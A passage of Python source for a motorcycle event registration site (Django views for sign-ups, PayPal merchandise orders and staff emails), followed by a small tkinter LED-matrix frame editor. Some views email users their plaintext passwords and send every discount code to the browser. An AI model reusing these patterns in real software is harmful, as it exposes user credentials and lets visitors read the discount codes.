len(ClubEvent.objects.all())\n return render(request, 'events/clubevents.html', {'form': form, 'signed_up': signed_up})\n\n\ndef registration_check(request):\n if request.POST:\n form = RegistrationCheck(request.POST)\n\n if form.is_valid():\n f = form.cleaned_data\n confirmation_number = f['confirmationNumber'].upper()\n first_name = f['first_name'].lower()\n last_name = f['last_name'].lower()\n\n if confirmation_number == '' and first_name == '' and last_name == '':\n form = RegistrationCheck()\n\n args = {\n 'result': False,\n 'name': '',\n 'event': 'Please provide first and last name or a confirmation number'\n }\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n if confirmation_number:\n try:\n event_id = RiderProfile.objects.filter(\n confirmation_number=confirmation_number).values_list('event_id', flat=True)\n\n confirmation_names = RiderProfile.objects.filter(\n confirmation_number=confirmation_number).values_list('first_name', 'last_name')\n\n if event_id is not None:\n confirmation_names = list(confirmation_names)\n first_and_last_names = list((' '.join(name).title() for name in confirmation_names))\n first_and_last_names_format = []\n for name in first_and_last_names:\n if name == first_and_last_names[-1]:\n first_and_last_names_format.append('and ' + name)\n else:\n first_and_last_names_format.append(name + ', ')\n event_name = Event.objects.filter(id=event_id[0]).values_list('event_name', flat=True)\n event_date = Event.objects.filter(id=event_id[0]).values_list('event_date', flat=True)\n event_data = event_name[0] + ' scheduled for ' + event_date[0].strftime('%m/%d/%Y')\n args = {\n 'result': True,\n 'name': first_and_last_names_format,\n 'event': 'registered for ' + event_data + '.'\n }\n\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n except:\n args = {\n 'result': False,\n 'name': '',\n 'event': 'That confirmation number was not found.'\n }\n\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n elif first_name != '' and last_name != '':\n event_id = RiderProfile.objects.filter(first_name__iexact=first_name).filter(\n last_name__iexact=last_name).values_list(\n 'event', flat=True).last()\n if event_id is not None:\n first_and_last_names = [first_name.capitalize() + \" \" + last_name.capitalize()]\n event_name = Event.objects.filter(id=event_id).values_list('event_name', flat=True)\n event_date = Event.objects.filter(id=event_id).values_list('event_date', flat=True)\n event_data = event_name[0] + ' scheduled for ' + event_date[0].strftime('%m/%d/%Y')\n\n args = {\n 'result': True,\n 'name': first_and_last_names,\n 'event': 'registered for ' + event_data + '.'\n }\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n else:\n name = [first_name.capitalize() + ' ' + last_name.capitalize()]\n args = {\n 'result': True,\n 'name': name,\n 'event': 'not registered for an event.'\n }\n\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n else:\n form = RegistrationCheck()\n\n args = {\n 'result': False,\n 'name': '',\n 'event': 'Please enter a first and last name.'\n }\n return render(request, 'events/registration_check.html', {\"args\": args, 'form': form})\n\n else:\n errors = {\n 'errors': form.errors\n }\n return render(request, 'events/registration_check.html', {'form': form, 'errors': errors})\n\n else:\n form = RegistrationCheck()\n return render(request, 
'events/registration_check.html', {'form': form})\n\n\ndef merchCheckout(request):\n return render(request, 'events/merchCheckout.html')\n\n\ndef contact(request):\n return render(request, 'events/contact.html')\n\n\ndef merchandise(request):\n merchValues = Merchandise.objects.filter(available_on_merch_page=True).values()\n count = 1\n merch = {}\n for dict in merchValues:\n itemInfo = {}\n sizeQty = {}\n itemName = \"item_\" + str(count)\n for attr, value in dict.items():\n if 'quantity_available' in attr:\n sizeQty[attr] = value\n else:\n itemInfo[attr] = value\n count += 1\n merch[itemName] = [itemInfo, sizeQty]\n\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n form = MerchandiseOrderForm(request.POST)\n\n if form.is_valid():\n postData = request.POST.dict()\n # save the data to the database\n # try:\n itemsOrderedDict = json.loads(postData['items_ordered'])\n item_ordered = itemsOrderedDict['transactions'][0]['item_list']['items']\n all_items = ''\n paypal_order_id = itemsOrderedDict['transactions'][0]['related_resources'][0]['sale']['id']\n\n if MerchandiseOrder.objects.filter(paypal_order_id=paypal_order_id).exists():\n args = {\n \"thing_key\": paypal_order_id,\n }\n return render(request, 'events/merchCheckout.html', {\"args\": args})\n else:\n MerchandiseOrder.objects.create(\n first_name=postData['first_name'],\n last_name=postData['last_name'],\n address=postData['address'],\n city=postData['city'],\n state=postData['state'],\n zip_code=postData['zip_code'],\n email=postData['email'],\n date_ordered=itemsOrderedDict['create_time'],\n paypal_order_id=paypal_order_id,\n items_ordered=all_items)\n\n for item in item_ordered:\n for key in item:\n if key == 'name':\n all_items += 'Item: ' + str(item[key]) + ' - '\n if key == 'quantity':\n quantity = item[key]\n all_items += 'Quantity: ' + str(quantity) + '\\n'\n if key == 'sku':\n quantity = item['quantity']\n split_sku = item[key].split(' ')\n pk = split_sku[0]\n product = Merchandise.objects.get(pk=pk)\n current_quantity = getattr(product, split_sku[1])\n setattr(product, split_sku[1], current_quantity - quantity)\n product.save()\n\n args = {\n \"thing_key\": paypal_order_id,\n }\n return render(request, 'events/merchCheckout.html', {\"args\": args})\n\n else:\n args = {\n \"merch\": merch,\n }\n json_args = json.dumps(args)\n\n return render(request, \"events/merchandise.html\", {\"args\": args, \"json_args\": json_args, \"form\": form})\n\n else:\n form = MerchandiseOrderForm()\n args = {\n \"merch\": merch,\n }\n json_args = json.dumps(args)\n\n return render(request, \"events/merchandise.html\", {\"args\": args, \"json_args\": json_args, \"form\": form})\n\n\n@staff_member_required\ndef adminemail(request):\n events = list(Event.objects.all())\n allEmails = list(User.objects.values_list(\"email\", flat=True))\n args = {'allEmails': allEmails, 'events': events}\n if request.method == 'POST':\n data = request.POST\n subject = request.POST.get(\"subject\")\n header = request.POST.get(\"header\")\n subheader = request.POST.get(\"subheader\")\n emailmessage = request.POST.get(\"message\").replace('\\n', '
<br>')\n recipients = request.POST.get(\"recipients\")\n\n if recipients == 'All Persons in the Database':\n recipients = allEmails\n elif \"@\" not in recipients:\n # getting the emails for the selected event\n event_name = recipients[:-5]\n event_year = recipients[-4:]\n # Event.objects.filter(event_name=event_name).filter(event_date__contains=event_year):\n # print('in the for loop')\n recipients = list(\n Event.objects.filter(event_name=event_name).filter(event_date__contains=event_year).values_list(\n 'riderprofile__email', flat=True))\n else:\n recipients = [recipients]\n print(recipients)\n args = {'allEmails': allEmails, 'events': events,\n \"success\": \"Your email was successfully sent!
    \"}\n\n general_email(subject, header, subheader, emailmessage, recipients)\n\n return render(request, 'events/adminemail.html', args)\n else:\n events = list(Event.objects.all())\n allEmails = list(RiderProfile.objects.values_list(\"email\", flat=True))\n args = {'allEmails': allEmails, 'events': events}\n return render(request, 'events/adminemail.html', args)\n\n\ndef general_email(subject, header, subheader, emailmessage, recipients):\n msg = EmailMultiAlternatives(\n subject=subject,\n from_email=\"The Lobos Team \",\n to=recipients,\n reply_to=[\"Lobos Support \"],\n )\n msg.merge_data = {}\n msg.merge_global_data = {}\n\n html = loader.render_to_string(\n '../templates/events/generalemail.html',\n {\n 'header': header,\n 'subheader': subheader,\n 'message': emailmessage,\n }\n )\n msg.attach_alternative(html, \"text/html\")\n\n # Optional Anymail extensions:\n msg.tags = [\"general communication\"]\n msg.track_clicks = True\n # Send it:\n msg.send()\n\n\ndef home(request):\n events = Event.objects.all().order_by('-event_date')[0:2]\n event_name = events.values_list('event_name', flat=True)\n event_dates = events.values_list('event_date', flat=True)\n year_list = []\n event_date = []\n event_details = []\n event_location = []\n map_location = []\n description = []\n pre_entry_cost = []\n post_entry_cost = []\n escort_rider_cost = []\n entry_closes = []\n rider_limit = []\n reg_riders = []\n remaining_spots = []\n remaining_time = []\n open_registration = []\n promotion = []\n promotion_description = []\n promotion_count = []\n\n for event in event_name:\n event_id = Event.objects.get(event_name=event).id\n reg_riders.append(RiderProfile.objects.filter(event=event_id).count())\n\n for date in event_dates:\n tte = int((date - dt.date.today()).days)\n\n try:\n if tte == 0:\n remaining_time.append(\"It's Today!!!\")\n elif tte < 1:\n remaining_time.append(\"Results to Come!\")\n else:\n remaining_time.append(tte)\n except:\n remaining_time.append(\"TBD\")\n\n for date in event_dates:\n year = str(date)[:4]\n year_list.append(year)\n\n for event in events:\n\n event_date.append(event.event_date)\n event_details.append(event.event_details)\n event_location.append(event.event_location)\n map_location.append(event.map_location)\n description.append(event.description)\n pre_entry_cost.append(event.pre_entry_cost)\n post_entry_cost.append(event.post_entry_cost)\n entry_closes.append(event.entry_closes)\n escort_rider_cost.append(event.escort_rider_cost)\n rider_limit.append(event.rider_limit)\n open_registration.append(event.open_registration)\n promotion.append(event.promotion)\n if event.promotion is not None:\n # total not to exceed\n promo_limit = \\\n SignupPromotion.objects.filter(promotion_item_name=event.promotion.promotion_item_name).values_list(\n 'promotion_limit', flat=True)[0]\n promo_count = len(RiderProfile.objects.filter(promotion_name=event.promotion.promotion_item_name))\n event.promotion.promotion_limit = promo_limit - promo_count\n\n promotion_count.append(event.promotion.promotion_limit)\n promotion_description.append(event.promotion.promotion_description)\n else:\n promotion_count.append(0)\n promotion_description.append(0)\n\n for limit, rider in zip(rider_limit, reg_riders):\n try:\n remaining_spots.append(limit - rider)\n except:\n remaining_spots.append('TBD')\n\n events_details = zip(event_name, # 0\n year_list, # 1\n event_date, # 2\n event_details, # 3\n event_location, # 4\n map_location, # 5\n description, # 6\n pre_entry_cost, # 7\n post_entry_cost, # 8\n 
entry_closes, # 9\n escort_rider_cost, # 10\n remaining_spots, # 11\n remaining_time, # 12\n open_registration, # 13\n promotion, # 14\n promotion_count, # 15\n promotion_description, # 16\n )\n\n context = {'events_details': events_details}\n\n return render(request, 'events/home.html', context)\n\n\ndef login(request):\n return render(request, 'events/login.html')\n\n\n# Email\ndef send_mail_user_reg(email, first_name, last_name, username, password):\n msg = EmailMultiAlternatives(\n subject=\"Welcome to Lobos\",\n from_email=\"The Lobos Team \",\n to=[email],\n reply_to=[\"Lobos Support \"])\n\n html = loader.render_to_string(\n '../templates/events/userregistertemplate.html',\n {\n 'name': first_name.title() + \" \" + last_name.title(),\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title,\n 'password': password,\n }\n )\n msg.attach_alternative(html, \"text/html\")\n\n # Optional Anymail extensions:\n msg.tags = [\"activation\", \"onboarding\"]\n msg.track_clicks = True\n\n # Send it:\n msg.send()\n\n\ndef register(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n email = request.POST['email'].replace(\" \", \"\")\n first_name = request.POST['first_name'].replace(\" \", \"\")\n last_name = request.POST['last_name'].replace(\" \", \"\")\n username = first_name.lower() + last_name.lower() + \\\n email.lower().replace(\" \", \"\")\n password = request.POST['password1']\n\n if User.objects.filter(username=username).exists():\n user_id = User.objects.get(username=username).id\n args = {'form': form,\n 'uniqueNameErrors': '
A user with this first and last name and email already exists. Reset your password here.
    '}\n return render(request, 'events/reg_form.html', args)\n\n else:\n form.save()\n send_mail_user_reg(email, first_name, last_name, username, password)\n return redirect('/login/')\n\n else:\n args = {'form': form, 'errors': form.errors}\n return render(request, 'events/reg_form.html', args)\n\n else:\n form = RegistrationForm()\n args = {'form': form}\n return render(request, 'events/reg_form.html', args)\n\n\ndef profile(request):\n args = {'user': request.user}\n return render(request, 'events/profile.html', args)\n\n\ndef edit_profile(request):\n if request.method == 'POST':\n form = EditProfileForm(request.POST, instance=request.user)\n\n if form.is_valid():\n form.save()\n return redirect('/profile')\n else:\n form = EditProfileForm(instance=request.user)\n args = {\n 'form': form, 'errors': 'A user with that username already exists. Please choose a different one.'}\n return render(request, 'events/edit_profile.html', args)\n else:\n form = EditProfileForm(instance=request.user.profile)\n args = {'form': form}\n return render(request, 'events/edit_profile.html', args)\n\n\ndef change_password(request):\n if request.method == 'POST':\n form = PasswordChangeForm(data=request.POST, user=request.user)\n\n if form.is_valid():\n form.save()\n update_session_auth_hash(request, form.user)\n subject = 'LobosEvents.com Password Change'\n from_email = 'MrWolf@LobosEvents.com'\n to = request.user.email\n first_name = request.user.first_name\n username = request.user.username\n\n text_content = 'Hi ' + first_name.title() + \\\n '\\nYou recently requested to reset your password at LobosEvents.com. \\n' \\\n 'Your username, in case you\\'ve forgotten: ' + username\n\n html_content = 'Hi ' + first_name.title() + \\\n '\\nYou recently requested to reset your password at LobosEvents.com. 
\\n' \\\n 'Your username, in case you\\'ve forgotten: ' + username\n\n msg = EmailMultiAlternatives(\n subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n return redirect('/profile/')\n else:\n # changed this from formset.errors to form.errors\n # errors = {'errors': formset.errors}\n errors = {'errors': form.errors}\n return redirect('change_password', errors)\n else:\n form = PasswordChangeForm(user=request.user)\n args = {'form': form}\n return render(request, 'events/password_change.html', args)\n\n\ndef error_checking(request):\n under_16 = 0\n escorts_signed_up = 0\n over_16 = False\n forms = json.load(request) # The form as html string\n event_date = forms[\"event_date\"].replace(\",\", \"\")\n event_date = ddt.strptime(event_date, '%B %d %Y')\n event_date = ddt.date(event_date)\n form_count = 0\n formset = RiderProfileFormSet(forms)\n\n if formset.is_valid():\n # calc age\n for form in formset:\n form_count += 1\n y = 0\n m = 0\n d = 0\n age_error = False\n email1 = form.cleaned_data['email']\n email2 = form.cleaned_data['email2']\n birth_date = form.cleaned_data['birth_date']\n rider_class = form.cleaned_data['rider_class']\n\n gender = form.cleaned_data['gender']\n y = event_date.year - birth_date.year\n m = event_date.month - birth_date.month\n d = event_date.day - birth_date.day\n\n # under 16 rider classes\n\n class_list_under_16 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\"]\n class_list_under_30 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\",\n \"Expert 16 and over 30 EX\", \"Expert 16 and over 40 EX-EX\",\n \"Amateur 16 and over 30 AM\", \"Amateur 16 and over 40 EX-AM\",\n \"Amateur 16 and over 40 AM\", \"Amateur 16 and over 50 AM\",\n \"Amateur 16 and over 50 EX\", \"60 Class\",\n \"70 Class\"]\n class_list_under_40 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"Expert 16 and over 40 EX-EX\",\n \"Amateur 16 and over 40 EX-AM\", \"Amateur 16 and over 40 AM\",\n \"Amateur 16 and over 50 AM\", \"Amateur 16 and over 50 EX\", \"60 Class\",\n \"70 Class\"]\n class_list_under_50 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"Amateur 16 and over 50 AM\", \"Amateur 16 and over 50 EX\",\n \"60 Class\",\n \"70 Class\"]\n class_list_under_60 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"60 Class\", \"70 Class\"]\n class_list_under_70 = [\"Expert under 16 AA\", \"Expert under 16 Open Expert\", \"Expert 
under 16 250 EX\",\n \"Amateur under 16 Open Amateur\", \"Amateur under 16 250 AM\",\n \"Amateur under 16 Sportsman\", \"Amateur under 16 Beginner\", \"Amateur under 16 Women\",\n \"Amateur under 16 Jr.\", \"70 Class\"]\n\n rider_class_check = False\n age_set = [30, 40, 50, 60, 70]\n content = {}\n if email1 != email2:\n content['email_not_the_same'] = True\n content[\"email_not_the_same_form\"] = form_count\n\n if y > 150:\n content['birthdate_wrong'] = True\n content[\"birthdate_form\"] = form_count\n # return JsonResponse(content)\n\n if (y < 16) or (y == 16 and m < 0) or (y == 16 and m == 0 and d < 0):\n under_16 += 1\n if rider_class not in class_list_under_16:\n content['under_class_age'] = {\n \"rider_class\": rider_class, 'form': form_count}\n content[\"age_error\"] = True\n else:\n pass\n else:\n over_16 = True\n\n if rider_class == \"Escort Rider\" and over_16 == True:\n escorts_signed_up += 1\n\n if (under_16 - escorts_signed_up > 0):\n error = 'escorts' if (\n under_16 - escorts_signed_up > 1) else 'escort'\n content['escorts_signed_up'] = escorts_signed_up\n content['under_16'] = under_16\n\n for age in age_set:\n if (y < age and y >= 16) or (y == age and m < 0) or (y == age and m == 0 and d < 0):\n if (age == 30 and rider_class in class_list_under_30) or \\\n (age == 40 and rider_class in class_list_under_40) or \\\n (age == 50 and rider_class in class_list_under_50) or \\\n (age == 60 and rider_class in class_list_under_60) or \\\n (age == 70 and rider_class in class_list_under_70):\n content['under_class_age'] = {\n \"age\": age, \"rider_class\": rider_class, 'form': form_count}\n content[\"age_error\"] = True\n # return JsonResponse(content)\n\n if gender == 'Male' and (rider_class == 'Amateur under 16 Women' or rider_class == \"Amateur 16 and over Women\"):\n content['gender_class'] = True\n content['gender_form'] = form_count\n # return JsonResponse(content)\n if content != {}:\n return JsonResponse(content)\n\n else:\n content = {'success': True}\n return JsonResponse(content)\n\n else:\n content = {'errors': formset.errors, 'success': False, 'escorts_signed_up': escorts_signed_up,\n 'under_16': under_16, }\n return JsonResponse(content)\n\n\ndef event_mail(email, first_name, last_name, username, rider_class, event, confirmation_number):\n msg = EmailMultiAlternatives(\n subject=\"You're Registered!\",\n from_email=\"The Lobos Team \",\n to=[email],\n reply_to=[\"Lobos Support \"])\n\n html = loader.render_to_string(\n '../templates/events/eventregistertemplate.html',\n {\n 'event': event,\n 'rider_class': rider_class,\n 'name': first_name.title() + \" \" + last_name.title(),\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title,\n 'confirmation_number': confirmation_number,\n }\n )\n msg.attach_alternative(html, \"text/html\")\n\n # Optional Anymail extensions:\n msg.tags = [\"event_registration\"]\n msg.track_clicks = True\n\n # Send it:\n msg.send()\n\n\ndef event_register(request):\n if request.method == 'POST':\n formset_post = RiderProfileFormSet(request.POST)\n\n if formset_post.is_valid():\n formset = formset_post.save(commit=False)\n postData = request.POST.dict()\n try:\n itemsOrderedDict = json.loads(postData['form-0-items_ordered'])\n except:\n itemsOrderedDict = 'Free Race Entry Using Discount Code'\n try:\n confirmation_number = itemsOrderedDict['transactions'][0]['related_resources'][0]['sale']['id']\n except:\n confirmation_number = 'DISC' + id_generator()\n confirmation_number = confirmation_number.upper()\n\n if 
RiderProfile.objects.filter(confirmation_number=confirmation_number).exists():\n args = {\n \"confirmation_number\": confirmation_number,\n }\n return render(request, 'events/event_resubmited.html', {\"args\": args})\n\n count = 0\n confirm = {}\n for form in formset:\n count += 1\n created_username = form.first_name + form.last_name + form.email\n created_username = created_username.replace(\" \", \"\").lower()\n form.confirmation_number = confirmation_number\n form.event = Event.objects.get(\n event_name=request.GET.get('event'))\n event = str(form.event)\n\n if form.discount_code != None:\n usedCode = form.discount_code\n # Codes.objects.filter(discount_code=usedCode).delete()\n\n if User.objects.filter(username=created_username).exists():\n user_id = User.objects.get(username=created_username).id\n\n if not User.objects.filter(username=created_username).exists():\n user = User.objects.create(username=created_username,\n email=form.email,\n first_name=form.first_name,\n last_name=form.last_name, )\n\n user.first_name = form.first_name.lower()\n user.last_name = form.last_name.lower()\n user.save()\n form.user = user\n user = Profile.objects.filter(user=user)\n user.update(address=form.address)\n user.update(gender=form.gender)\n user.update(birth_date=form.birth_date)\n user.update(phone_number=form.phone_number)\n user.update(country=form.country)\n user.update(address_line_two=form.address_line_two)\n user.update(city=form.city)\n user.update(state=form.state)\n user.update(zip_code=form.zip_code)\n user.update(\n emergency_contact_name=form.emergency_contact_name)\n user.update(\n emergency_contact_phone=form.emergency_contact_phone)\n\n message = ''\n username = created_username\n first_name = form.first_name.lower()\n last_name = form.last_name.lower()\n email = form.email.lower()\n rider_class = form.rider_class\n\n confirm[created_username] = {'message': message,\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title(),\n 'email': email,\n 'confirmation': confirmation_number,\n 'rider_class': rider_class}\n form.save()\n\n # Email\n try:\n event_mail(email, first_name, last_name, username, rider_class, event,\n confirmation_number)\n except:\n print(\"An exception occurred with email. Email not sent to \" + email)\n\n elif RiderProfile.objects.filter(event=form.event).filter(user=user_id).exists():\n form.user = User.objects.get(username=created_username)\n username = created_username\n first_name = form.first_name.lower()\n last_name = form.last_name.lower()\n email = form.email\n rider_class = form.rider_class\n\n # if we want to send the old confirmation number, uncomment below code\n # confirmation = RiderProfile.objects.get(event=form.event, user=user_id).confirmation_number\n\n message = 'The rider, ' + first_name + ' ' + last_name + ', has previously been registered.' + \\\n ' Please contact the person you registered to verify.' \\\n ' If they have been registered twice please contact us for a refund for that entry.' \\\n ' Email us at info@lobosmc.com'\n\n confirm[created_username] = {'message': message,\n 'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title(),\n 'email': email,\n 'confirmation': confirmation_number,\n 'rider_class': rider_class}\n form.save()\n\n # Email\n try:\n event_mail(email, first_name, last_name, username, rider_class, event,\n confirmation_number)\n except:\n print(\"An exception occurred with email. 
Email not sent to \" + email)\n\n else:\n form.user = User.objects.get(username=created_username)\n username = created_username\n first_name = form.first_name.lower()\n last_name = form.last_name.lower()\n email = form.email.lower()\n rider_class = form.rider_class\n\n confirm[created_username] = {'username': username,\n 'first_name': first_name.title(),\n 'last_name': last_name.title(),\n 'email': email,\n 'confirmation': confirmation_number,\n 'rider_class': rider_class}\n\n form.save()\n\n # Email\n try:\n event_mail(email, first_name, last_name, username, rider_class, event,\n confirmation_number)\n except:\n print(\"An exception occurred with email. Email not sent to \" + email)\n\n args = {'event': form.event, 'confirm': confirm}\n # email confirmation function here\n return render(request, 'events/event_confirmation.html', args)\n else:\n errors = formset_post.errors\n event = Event.objects.get(event_name=request.GET.get('event'))\n formset = prefill_form(request)\n codes = dict(Codes.objects.values_list(\n 'discount_code', 'discount_amount'))\n codes = dict((key.lower(), value) for key, value in codes.items())\n codes = json.dumps(codes)\n print(codes)\n\n if event.promotion:\n event.promotion.promotion_options = promotion_func(event)\n promotion = event.promotion\n\n args = {'formset': formset, 'event': event, 'errors': errors, 'codes': codes, 'promotion': promotion}\n return render(request, 'events/event_register.html', args)\n\n else:\n # formset = prefill_form(request)\n event = Event.objects.get(event_name=request.GET.get('event'))\n rider_limit = event.rider_limit\n registered_riders = len(RiderProfile.objects.filter(event=event))\n\n if rider_limit - registered_riders <= 0:\n args = {'event': event}\n return render(request, 'events/sold_out.html', args)\n\n if not event.open_registration:\n args = {'event': event}\n return render(request, 'events/unavailable_event.html', args)\n\n codes = dict(Codes.objects.values_list(\n 'discount_code', 'discount_amount'))\n codes = dict((key.lower(), value) for key, value in codes.items())\n codes = json.dumps(codes)\n print(codes)\n\n promotion = event.promotion\n\n if event.promotion:\n event.promotion.promotion_options = promotion_func(event)\n if event.promotion.promotion_options is None:\n promotion = None\n\n args = {'event': event, 'codes': codes, 'promotion': promotion}\n # args = {'formset': formset, 'event': event, 'codes': codes}\n return render(request, 'events/event_register.html', args)\n\n\ndef event_confirmation(request):\n args = {'request': request, 'user': request.user}\n return render(request, 'events/event_confirmation.html', args)\n\n\ndef id_generator(size=9, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef event_formset(request):\n formset = prefill_form(request)\n formset = str(formset)\n event = json.loads(request.body)['event']\n promotion = json.loads(request.body)['promotion']\n event_date = json.loads(request.body)['event'][-4:]\n # escort_rider_cost = Event.objects.get(\n # event_name=event, event_date__contains=event_date).escort_rider_cost\n # reg_rider_cost = Event.objects.get(\n # event_name=event, event_date__contains=event_date).pre_entry_cost\n # reg_rider_cost = Event.objects.get(event_name=request.GET.get('event')).pre_entry_cost\n # formset_to_vue = {'reg_rider_cost': reg_rider_cost,\n # 'escort_rider_cost': escort_rider_cost, 'formset': formset}\n formset = re.sub('for=\"id_form-0-promotional_item\"',\n 
'for=\"id_form-0-promotional_item\" id=\"id_form-0-promotional_item_label\" class=\"hide\"', formset)\n\n formset = re.sub('for=\"id_form-0-promotion_options\"',\n 'for=\"id_form-0-promotion_options\" id=\"id_form-0-promotion_options_label\" class=\"hide\"', formset)\n\n formset_to_vue = {'formset': formset}\n\n return JsonResponse(formset_to_vue)\n\n\ndef prefill_form(request):\n # form_fill_dict = {}\n # profile_field_names = []\n # prof = request.user.profile\n\n # for field in Profile._meta.get_fields():\n # if field.name is not 'id':\n # profile_field_names.append(field.name)\n # field = str(field.name)\n # form_fill_dict[field] = getattr(prof, field)\n\n # user_field_names = ['first_name', 'last_name', 'email']\n # user_prof = request.user\n # for field in User._meta.get_fields():\n # field = str(field.name)\n # if field in user_field_names:\n # form_fill_dict[field] = getattr(user_prof, field)\n # return RiderProfileFormSet(queryset=RiderProfile.objects.none(), initial=[form_fill_dict])\n return RiderProfileFormSet(queryset=RiderProfile.objects.none())\n\n\ndef promotion_func(event):\n # total not to exceed\n promo_limit = SignupPromotion.objects.filter(promotion_item_name=event.promotion.promotion_item_name).values_list(\n 'promotion_limit', flat=True)[0]\n promo_count = len(RiderProfile.objects.filter(promotion_name=event.promotion.promotion_item_name))\n\n # if the limit is reached\n if promo_count >= promo_limit:\n return None\n\n # string options to add to list\n options_string = \\\n SignupPromotion.objects.filter(promotion_item_name=event.promotion.promotion_item_name).values_list(\n 'promotion_options', flat=True)[0]\n\n # how many options in the promotion\n options_count = len(options_string.split(','))\n\n # listing the options\n options_list = options_string.split(',')\n\n # total per option\n limit_per_option = math.floor(promo_limit / options_count)\n\n # options taken count\n rider_promo_option_count = []\n for option in options_list:\n count = len(RiderProfile.objects.filter(promotion_name=event.promotion.promotion_item_name).filter(\n promotion_options=option))\n rider_promo_option_count.append({option: count})\n\n promo_options_available = []\n # options to add to list\n for promo_time in rider_promo_option_count:\n for key, value in promo_time.items():\n if value < limit_per_option:\n promo_options_available.append(key)\n\n str_promo_options = ','.join(promo_options_available)\n\n return str_promo_options\n","repo_name":"unitedideas/lobos","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":43093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27567433696","text":"import sys\nimport tkinter as tk\nfrom typing import List\nfrom src.load import config\nfrom src.FileManager import FileManager\nfrom src.StateManager import StateManager\n\nif __name__ == '__main__':\n filename = sys.argv[1]\n fm = FileManager(filename, config['rows'], config['columns'])\n fm.read()\n if (fm.is_data_corrupt()):\n decision = input('data file is corrupt, fix it automatically? 
(y/n): ')\n if (decision == 'y' or decision == 'Y'):\n fm.fix_data()\n else:\n sys.exit()\n fm.write()\n\n app = tk.Tk()\n sm = StateManager(fm.data, fm.rows, fm.columns, config['pixel_on_hex_color'], config['pixel_off_hex_color'])\n\n header_section0 = tk.Frame(app)\n tk.Button(header_section0, text='Save', command=fm.write, highlightbackground=config['save_button_color']).pack()\n header_section0.pack()\n\n header_section1 = tk.Frame(app)\n tk.Button(header_section1, text='Remove Current Frame', command=sm.on_remove_frame, highlightbackground=config['remove_current_frame_color']).pack(side=tk.LEFT)\n tk.Button(header_section1, text='Clear Current Frame', command=sm.on_clear_frame, highlightbackground=config['clear_current_frame_color']).pack(side=tk.RIGHT)\n header_section1.pack()\n\n header_section2 = tk.Frame(app)\n tk.Button(header_section2, text='<< Add Empty Frame', command=sm.on_add_empty_frame_before, highlightbackground=config['add_empty_frame_color']).pack(side=tk.LEFT)\n tk.Button(header_section2, text='Add Empty Frame >>', command=sm.on_add_empty_frame_after, highlightbackground=config['add_empty_frame_color']).pack(side=tk.RIGHT)\n header_section2.pack()\n\n header_section3 = tk.Frame(app)\n tk.Button(header_section3, text='<< Add Copy Of Current Frame', command=sm.on_duplicate_frame_before, highlightbackground=config['add_duplicate_frame_color']).pack(side=tk.LEFT)\n tk.Button(header_section3, text='Add Copy Of Current Frame >>', command=sm.on_duplicate_frame_after, highlightbackground=config['add_duplicate_frame_color']).pack(side=tk.RIGHT)\n header_section3.pack()\n\n buttons = []\n matrix_section = tk.Frame(app)\n for i in range(0, fm.rows):\n row_of_buttons = []\n for j in range(0, fm.columns):\n frame = tk.Frame(matrix_section, width=config['pixel_size'], height=config['pixel_size'])\n button = tk.Button(frame, command=sm.handle_pixel_click(i, j))\n button.grid(sticky=\"wens\")\n frame.grid_propagate(False) #disables resizing of frame\n frame.columnconfigure(0, weight=1) #enables button to fill frame\n frame.rowconfigure(0,weight=1) #any positive number would do the trick\n frame.grid(row=i, column=j) #put frame where the button should be\n row_of_buttons.append(button)\n buttons.append(row_of_buttons)\n matrix_section.pack()\n sm.set_pixel_buttons(buttons)\n\n footer_section = tk.Frame(app)\n for i, nav_size in enumerate(sorted(config['nav_sizes'], reverse=True)):\n button_color = config['contrast_dark'] if (i % 2 == 0) else config['contrast_light']\n tk.Button(footer_section, text='-{0}'.format(nav_size), command=sm.handle_page_change(-nav_size), highlightbackground=button_color).pack(side=tk.LEFT)\n tk.Button(footer_section, text='+{0}'.format(nav_size), command=sm.handle_page_change(nav_size), highlightbackground=button_color).pack(side=tk.RIGHT)\n tk.Label(footer_section, textvariable=sm.current_page).pack(side=tk.BOTTOM)\n footer_section.pack()\n\n 